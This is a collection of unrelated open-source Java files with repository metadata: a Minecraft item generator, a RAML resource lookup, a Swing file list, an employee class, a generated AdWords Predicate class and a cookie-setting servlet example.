t, enchants); } private ItemGen(ArmorMat atype, int weight, Object... enchants) { this.amat = atype; init(weight, Type.Armor, enchants); } private ItemGen(Material type, int data, int weight, Type t, Object... enchants) { this.type = type; this.data = (short) data; init(weight, t, enchants); } private ItemGen(ArmorMat atype, int data, int weight, Object... enchants) { this.amat = atype; this.data = (short) data; init(weight, Type.Armor, enchants); } private ItemGen(ItemStack it, int weight, Type t) { exact = it; this.type = it.getType(); this.data = it.getDurability(); init(weight, t, new Object[0]); } private void init(int weight, Type t, Object... enchants) { this.weight = weight; this.name = name().replace('_', ' '); this.t = t; for (int i = 0; i < enchants.length; i += 2) { Object o = enchants[i]; Object o2 = enchants[i + 1]; if (o instanceof Enchantment && o2 instanceof Integer) { this.enchants.put((Enchantment) o, (Integer) o2); } } } public ItemStack getItem(ArmorType at) { Random rand = new Random(); Material mat = t != Type.Armor ? type : getType(at, amat); int amount = t != Type.Spell ? rand.nextInt(((int) mat.getMaxStackSize() / 10) + 1) + 1 : 1; if (exact != null) { return exact; } ItemStack it = new ItemStack(mat, amount, data); if (t != Type.Other) { ItemMetaUtils.setItemName(it, ChatColor.RESET + getName(at)); } for (Map.Entry<Enchantment, Integer> ent : enchants.entrySet()) { it.addEnchantment(ent.getKey(), ent.getValue()); } return it; } public String getName(ArmorType at) { if (amat != null) { return name + " " + at.name; } else if (type != null) { return name; } throw new IllegalArgumentException(); } public static ItemGen getRandom(Type t) { List<ItemGen> items = t == null ? Arrays.asList(values()) : getAllOfType(t); double totalWeight = 0.0d; for (ItemGen i : items) { totalWeight += i.weight; } int randomIndex = -1; double random = Math.random() * totalWeight; for (int i = 0; i < items.size(); ++i) { random -= items.get(i).weight; if (random <= 0.0d) { randomIndex = i; break; } } return items.get(randomIndex); } public static List<ItemGen> getAllOfType(Type t) { List<ItemGen> its = new ArrayList<>(); for (ItemGen ig : ItemGen.values()) { if (ig.t == t) { its.add(ig); } } return its; } public static enum Type { Sword, Armor, Bow, Food, Other, Spell; } public static enum ArmorType { HELMET, CHESTPLATE, LEGGINGS, BOOTS; public String name; private ArmorType() { name = WordUtils.capitalizeFully(name()); } } public static enum ArmorMat { LEATHER, CHAINMAIL, IRON, DIAMOND, GOLD; } public Material getType(ArmorType at, ArmorMat am) { return Material.valueOf(am.name() + "_" + at.name()); } }
[ "golfboy2300@yahoo.com" ]
golfboy2300@yahoo.com
2a23444f30f3f8a02ab21db01b5393d6cb9f0536
bc7cac88df9fa84d34901933790854184fcee983
/src/main/java/com/phoenixnap/oss/ramlplugin/raml2code/raml/RamlResourceRoot.java
c28283309416cc34f57c73f366273e2137fe7318
[ "Apache-2.0" ]
permissive
Adriscream/springmvc-raml-plugin
4a692ebaf24bb27962f4cd2f4e6c9fcbe67d37b3
6387072317cd771eb7d6f30943f556ac20dd3c84
refs/heads/master
2020-05-21T00:17:25.818062
2019-02-01T11:09:01
2019-02-01T11:09:01
185,822,294
1
0
null
2019-05-09T15:08:28
2019-05-09T15:08:28
null
UTF-8
Java
false
false
1,972
java
/* * Copyright 2002-2017 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the * specific language governing permissions and limitations under the License. */ package com.phoenixnap.oss.ramlplugin.raml2code.raml; import java.util.Map; /** * Abstract Representation of a Raml Resource. RamlResourceRoot is an element * that can contain other resources. * * @author armin.weisser * @since 0.8.1 */ public interface RamlResourceRoot { /** * Given a path with more than one segment the getResource(String) method * will recursively lookup a matching resource. * * @param path * a relative or absolute URI * @return the child RamlResource that matches the given path. */ default RamlResource getResource(String path) { String[] segments = path.split("/"); RamlResourceRoot current = this; RamlResource resource = null; boolean first = true; for (String segment : segments) { if (segment != null && !"".equals(segment)) { String segmentToCheck = segment; if ((first && path.startsWith("/")) || !first) { segmentToCheck = "/" + segmentToCheck; } resource = current.getResources().get(segmentToCheck); if (resource == null) { // if a part of the url isnt found we // need to return null since the entire // part isnt found return null; } current = resource; } first = false; } return resource; } /** * @return all direct child resources of this resource. */ Map<String, RamlResource> getResources(); }
[ "aleksandars@ccbill.com" ]
aleksandars@ccbill.com
31dd158b416233bb928b4fd0a8fd61a585126a40
b6341977a20dbc42f62146c297df4ad99a5a1704
/src/yamb/app/fileitem/filelist/FileJList.java
9b0b96f07405579b01f9dff97dbabb040a64e895
[ "LicenseRef-scancode-mediainfo-lib" ]
permissive
mlaflamm/yamb
7c92365bd1ba61b1e7272c8393ee98a67839f3f6
0450c8f66de3ad2910c3ff6f7c99f44457affc6a
refs/heads/master
2020-05-17T03:21:21.744170
2011-07-16T00:10:03
2011-07-16T00:26:51
1,627,275
0
0
null
null
null
null
UTF-8
Java
false
false
1,476
java
package yamb.app.fileitem.filelist; import yamb.app.view.FileListViewContext; import yamb.util.media.Videos; import yamb.util.media.mediainfo.MediaInfo; import yamb.util.media.mediainfo.cache.MediaInfoCache; import yamb.util.swing.AutoDisposeModelJList; import java.awt.event.MouseEvent; import javax.swing.DropMode; import javax.swing.JList; import javax.swing.ListSelectionModel; public class FileJList extends AutoDisposeModelJList { private final MediaInfoCache mMediaInfoCache; public FileJList(FileListViewContext aViewContext, MediaInfoCache aMediaInfoCache) { mMediaInfoCache = aMediaInfoCache; setSelectionMode(ListSelectionModel.MULTIPLE_INTERVAL_SELECTION); setCellRenderer(new FileListRenderer(aViewContext)); setLayoutOrientation(JList.VERTICAL_WRAP); // setLayoutOrientation(JList.HORIZONTAL_WRAP); setVisibleRowCount(-1); setDropMode(DropMode.ON); } public String getToolTipText(MouseEvent aEvent) { int index = locationToIndex(aEvent.getPoint()); if (index >= 0 && getCellBounds(index, index).contains(aEvent.getPoint())) { FileListItem fileItem = (FileListItem) getModel().getElementAt(index); MediaInfo mediaInfo = mMediaInfoCache.getCachedMediaInfo(fileItem.getFile()); return Videos.getVideoDetailsHtml(fileItem.getFile(), mediaInfo); } return null; } }
[ "manuel.laflamme@gmail.com" ]
manuel.laflamme@gmail.com
c3aa263f79e90f2e4554f61c54b2e3546f59e1b1
4756381a5951fcbd9e56943d69754283e428f299
/ShiftSupervisor.java
d0434b989d6e01bcf554ed0436cde429fe50e644
[]
no_license
DemonVenom/EmployeeWorkers
671489fad4eeb6bb40860fe2086fbe12314fa6a4
c8531737b656de9ecde3c302bc785c89465a2ef2
refs/heads/main
2023-06-07T09:14:43.056636
2021-07-08T01:41:43
2021-07-08T01:41:43
383,949,671
0
0
null
null
null
null
UTF-8
Java
false
false
663
java
import java.io.*; import java.util.Scanner; public class ShiftSupervisor extends Employee { private double yearlySalary; private double yearlyBonus; public ShiftSupervisor(String name, String id, String hire, double salary, double yearbonus) { super(name, id, hire); yearlySalary = salary; yearlyBonus = yearbonus; } @Override public String toString(){ return String.format("Shift Supervisor:\nName: %s\nNumber: %s\nHire Date: %s\nYearly Salary: %.2f\nYearly Bonus: %.2f\n", employeeName, employeeNumber, hireDate, yearlySalary, yearlyBonus); } }
[ "noreply@github.com" ]
DemonVenom.noreply@github.com
8df88853c6c4339a270c2fd307f96ec93cef6b02
fc204738b5d6fd6514a18d20d63a08ac2a298d84
/modules/ads_lib/src/main/java/com/google/api/ads/adwords/lib/jaxb/v201502/Predicate.java
cae8130e6bdfb57ed109e7672c25f1990bb06f33
[ "Apache-2.0" ]
permissive
rudraSharva/googleads-java-lib
8ad14c6e8510a48e703d2c8232c5765ed8943c9d
2c558fcc5662a8b65082f312f09f0b31c014cb31
refs/heads/master
2021-01-17T12:05:29.608803
2015-06-10T17:55:35
2015-06-10T17:55:35
null
0
0
null
null
null
null
UTF-8
Java
false
false
3,608
java
// // This file was generated by the JavaTM Architecture for XML Binding(JAXB) Reference Implementation, v2.2.11 // See <a href="http://java.sun.com/xml/jaxb">http://java.sun.com/xml/jaxb</a> // Any modifications to this file will be lost upon recompilation of the source schema. // Generated on: 2015.06.10 at 09:15:07 AM PDT // package com.google.api.ads.adwords.lib.jaxb.v201502; import java.util.ArrayList; import java.util.List; import javax.xml.bind.annotation.XmlAccessType; import javax.xml.bind.annotation.XmlAccessorType; import javax.xml.bind.annotation.XmlElement; import javax.xml.bind.annotation.XmlSchemaType; import javax.xml.bind.annotation.XmlType; /** * <p>Java class for Predicate complex type. * * <p>The following schema fragment specifies the expected content contained within this class. * * <pre> * &lt;complexType name="Predicate"&gt; * &lt;complexContent&gt; * &lt;restriction base="{http://www.w3.org/2001/XMLSchema}anyType"&gt; * &lt;sequence&gt; * &lt;element name="field" type="{http://www.w3.org/2001/XMLSchema}string"/&gt; * &lt;element name="operator" type="{https://adwords.google.com/api/adwords/cm/v201502}Predicate.Operator"/&gt; * &lt;element name="values" type="{http://www.w3.org/2001/XMLSchema}string" maxOccurs="unbounded"/&gt; * &lt;/sequence&gt; * &lt;/restriction&gt; * &lt;/complexContent&gt; * &lt;/complexType&gt; * </pre> * * */ @XmlAccessorType(XmlAccessType.FIELD) @XmlType(name = "Predicate", propOrder = { "field", "operator", "values" }) public class Predicate { @XmlElement(required = true) protected String field; @XmlElement(required = true) @XmlSchemaType(name = "string") protected PredicateOperator operator; @XmlElement(required = true, nillable = true) protected List<String> values; /** * Gets the value of the field property. * * @return * possible object is * {@link String } * */ public String getField() { return field; } /** * Sets the value of the field property. * * @param value * allowed object is * {@link String } * */ public void setField(String value) { this.field = value; } /** * Gets the value of the operator property. * * @return * possible object is * {@link PredicateOperator } * */ public PredicateOperator getOperator() { return operator; } /** * Sets the value of the operator property. * * @param value * allowed object is * {@link PredicateOperator } * */ public void setOperator(PredicateOperator value) { this.operator = value; } /** * Gets the value of the values property. * * <p> * This accessor method returns a reference to the live list, * not a snapshot. Therefore any modification you make to the * returned list will be present inside the JAXB object. * This is why there is not a <CODE>set</CODE> method for the values property. * * <p> * For example, to add a new item, do as follows: * <pre> * getValues().add(newItem); * </pre> * * * <p> * Objects of the following type(s) are allowed in the list * {@link String } * * */ public List<String> getValues() { if (values == null) { values = new ArrayList<String>(); } return this.values; } }
[ "jradcliff@google.com" ]
jradcliff@google.com
660a721a73345723c9d4f1003e3e7d2e48df652e
4c061a58fb166964b4f254bff903f781b482ea62
/edu/src/com/edu/test/CookieTestServlet.java
f4fb10fdb78d13916bfbee0ca0709a31ff3252d8
[]
no_license
powerseunghun/servlet_programming_practice
ba104eb5881a0bae307ba12e8fd2f6c1352a18b1
dc2e491c4993677a695a7d70d5a53f9203bb8f3e
refs/heads/master
2022-06-22T16:29:01.531412
2020-05-06T12:48:59
2020-05-06T12:48:59
null
0
0
null
null
null
null
UTF-8
Java
false
false
1,002
java
package com.edu.test; import java.io.IOException; import java.io.PrintWriter; import javax.servlet.ServletException; import javax.servlet.annotation.WebServlet; import javax.servlet.http.Cookie; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; @WebServlet("/cookie1") public class CookieTestServlet extends HttpServlet{ @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { resp.setContentType("text/html;charset=UTF-8"); PrintWriter out = resp.getWriter(); Cookie c1 = new Cookie("id", "guest"); c1.setPath("/"); resp.addCookie(c1); Cookie c2 = new Cookie("code", "0001"); c2.setMaxAge(60 * 60 * 3); c2.setPath("/"); resp.addCookie(c2); Cookie c3 = new Cookie("Subject", "java"); c3.setMaxAge(60 * 60 * 24 * 10); c3.setPath("/"); resp.addCookie(c3); out.println("쿠키 전송 완료"); out.close(); } }
[ "30817976+powerseunghun@users.noreply.github.com" ]
30817976+powerseunghun@users.noreply.github.com